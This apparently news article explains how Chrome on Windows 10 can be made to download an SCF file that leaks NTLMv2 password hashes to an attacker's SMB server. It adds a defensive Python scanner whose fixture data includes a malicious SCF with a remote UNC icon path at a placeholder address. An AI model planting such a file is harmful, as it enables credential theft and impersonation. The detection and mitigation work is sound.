Given the recent Google discovery of a flaw in Windows Defender, and the Google discovery of a flaw in Internet Explorer and Edge, it would appear that Google and Microsoft aren’t exactly friendly when it comes to working together. This time, however, a new flaw has been discovered for which both tech giants may share the blame, as attackers can exploit it to use Chrome on Windows 10 to steal password hashes (via ZDNet).
While Google has said it is working on a fix for this flaw, DefenseCode security researcher Bosko Stankovic recently detailed how the latest version of Chrome on Windows 10 can be tricked into downloading an SCF file (the Windows “show desktop” shortcut format), which in turn tricks Windows into handing the attacker the user’s LAN Manager (NTLMv2) password hash.
Once the file is downloaded, the request is triggered the moment the download directory is opened in Windows File Explorer, whether to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file: Windows File Explorer will automatically try to retrieve the “icon”. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking, or to relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) and impersonate the victim without ever knowing the password.
Currently, the attacker only needs to entice the victim (running fully updated Google Chrome and Windows) to visit a web site in order to capture and reuse the victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such a vulnerability could pose a significant threat to large organisations, as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse the gained privileges to escalate access further and attack other users, or gain access to and control of IT resources.
The root of this flaw is the way in which Chrome and Windows handle SCF files. Chrome does not label these file types as dangerous and does not scan them for malicious intent; once the file is downloaded, Chrome relies on the default Windows settings. Because of this, the user does not even need to click or open the file: Windows Explorer will automatically try to retrieve the icon when the user enters the download directory, which causes the LAN Manager (NTLMv2) password hash to be captured.
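The mechanism described above boils down to one line inside the SCF file: the icon reference points at a remote SMB host instead of a local file, and Explorer follows it. The following script is an added example (it is not code from the article or from DefenseCode) of a defender-side check: it parses SCF files, pulls out the IconFile entry, and flags any whose icon would be fetched from a UNC path. The sample file contents and the 203.0.113.10 address are constructed for the demonstration.

```python
"""Flag downloaded .scf files whose icon reference points at a remote host.

Added example, not part of the original article. An SCF file is INI-style text
with a [Shell] section; its IconFile entry is what Explorer resolves when the
folder is displayed, so a UNC path there (\\host\share\...) means an outbound
SMB connection, and an NTLM authentication attempt, without any click.
"""
import re
from pathlib import Path

# Constructed sample files for the demonstration (not from the page).
SAMPLES = {
    "benign_show_desktop.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "remote_icon.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.10\\share\\icon.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "remote_icon_forward.scf": "[Shell]\r\nIconFile=//203.0.113.10/share/icon.ico\r\n",
    "local_absolute.scf": "[Shell]\r\nIconFile=C:\\Windows\\System32\\shell32.dll,4\r\n",
}

# A UNC path: two leading separators, a host name, then another separator.
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]")


def parse_scf(text):
    """Return {section: {key: value}} for INI-style text; names are lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_target(text):
    """The IconFile value from the [Shell] section, or None if absent."""
    return parse_scf(text).get("shell", {}).get("iconfile")


def is_remote_icon(text):
    """True when the icon would be fetched over the network (UNC path)."""
    target = icon_target(text)
    return bool(target and UNC_RE.match(target))


def scan_samples(samples=SAMPLES):
    """Names of in-memory samples that reference a remote icon, sorted."""
    return sorted(name for name, text in samples.items() if is_remote_icon(text))


def scan_directory(directory):
    """Same check over real .scf files in a folder, e.g. the Chrome download directory."""
    flagged = []
    for path in Path(directory).glob("*.scf"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if is_remote_icon(text):
            flagged.append(path.name)
    return sorted(flagged)


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name}: IconFile={icon_target(text)!r} remote={is_remote_icon(text)}")
    print("flagged:", scan_samples())
```

Running the script reports the two constructed samples with UNC icon paths and leaves the local-icon files alone; `scan_directory` applies the same test to a real folder. Note that the check only tells you a file would trigger the outbound request when viewed; it does nothing to stop Explorer from making it, so it belongs alongside the download setting recommended below and outbound SMB filtering at the network edge, not in place of them.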
To protect yourself, go to Settings > Show advanced settings and check the “Ask where to save each file before downloading” option, so that no file lands in your download directory without your knowledge.